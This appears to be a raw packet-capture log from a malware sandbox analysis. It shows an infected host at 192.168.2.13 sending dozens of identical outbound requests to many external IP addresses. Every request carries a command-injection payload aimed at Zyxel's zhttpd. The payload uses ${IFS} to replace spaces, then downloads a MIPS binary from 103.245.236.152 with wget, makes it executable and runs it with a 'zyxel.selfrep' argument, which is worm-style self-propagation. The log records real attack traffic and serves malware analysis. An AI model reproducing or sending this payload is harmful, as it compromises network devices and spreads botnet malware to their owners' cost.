                                        Jan 14, 2024 16:18:55.706974030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7188192.168.2.134863472.21.155.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707024097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7189192.168.2.1347564110.105.43.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707084894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7190192.168.2.1341684122.221.112.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707104921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7191192.168.2.13527585.145.156.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707159042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7192192.168.2.1336520216.192.35.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707199097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7193192.168.2.136026252.188.159.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707252979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7194192.168.2.1353452202.247.55.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707282066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7195192.168.2.1341298170.209.248.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707350969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7196192.168.2.1350058103.181.240.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707384109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7197192.168.2.134987293.24.58.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707418919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7198192.168.2.1353882125.63.122.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707469940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7199192.168.2.134902864.145.217.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707515955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7200192.168.2.1350688160.188.190.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707556009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7201192.168.2.1353566171.176.198.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707626104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7202192.168.2.133775465.219.240.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707629919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7203192.168.2.135254451.8.200.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707664013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7204192.168.2.135828617.87.78.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707736969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7205192.168.2.1358918208.204.240.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707781076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7206192.168.2.1350528195.240.166.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707833052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7207192.168.2.1344980191.66.103.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707866907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7208192.168.2.135642427.214.238.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707904100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7209192.168.2.133494460.162.82.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707942009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7210192.168.2.1347896161.175.113.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.707988024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7211192.168.2.1348126219.39.164.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708041906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7212192.168.2.1343082189.160.53.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708081007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7213192.168.2.1345486189.31.66.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708117962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7214192.168.2.1356212120.15.214.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708134890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7215192.168.2.13397745.131.122.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708192110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7216192.168.2.135996284.39.117.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708230019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7217192.168.2.13519048.221.252.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708277941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7218192.168.2.1342696128.243.105.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708333969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7219192.168.2.133993673.168.127.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708365917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7220192.168.2.135674645.232.72.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708458900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7221192.168.2.134927649.151.140.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708465099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7222192.168.2.1345504211.94.185.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708488941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7223192.168.2.1358128129.197.166.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708498955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7224192.168.2.134641688.47.47.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708532095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7225192.168.2.1335708179.21.29.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708594084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7226192.168.2.1341572135.196.114.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708653927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7227192.168.2.134219683.173.240.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708677053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7228192.168.2.134962813.108.210.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708720922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7229192.168.2.1339390191.102.187.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708755970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7230192.168.2.1346600123.202.167.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708810091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7231192.168.2.1337910180.187.229.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708842039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7232192.168.2.1352258155.204.8.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708909988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7233192.168.2.133502271.66.26.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708947897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7234192.168.2.135856870.249.201.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.708991051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7235192.168.2.1346076109.15.249.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709028959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7236192.168.2.133306854.153.97.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709064960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7237192.168.2.1355852118.250.53.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709095955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7238192.168.2.1351880196.143.185.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709120035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7239192.168.2.133808219.80.74.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709168911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7240192.168.2.1347934136.177.82.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709203959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7241192.168.2.1345610133.205.248.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709258080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7242192.168.2.133801627.59.186.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709295988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7243192.168.2.1354290220.0.213.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709319115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7244192.168.2.134029424.133.211.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709347963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7245192.168.2.1341492172.82.172.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709379911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7246192.168.2.1352632207.234.238.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709408045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7247192.168.2.135579667.147.155.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709445000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7248192.168.2.1351332210.12.62.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709470987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7249192.168.2.135125095.64.136.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.709503889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7250192.168.2.135644465.209.80.0443
                                        TimestampBytes transferredDirectionData
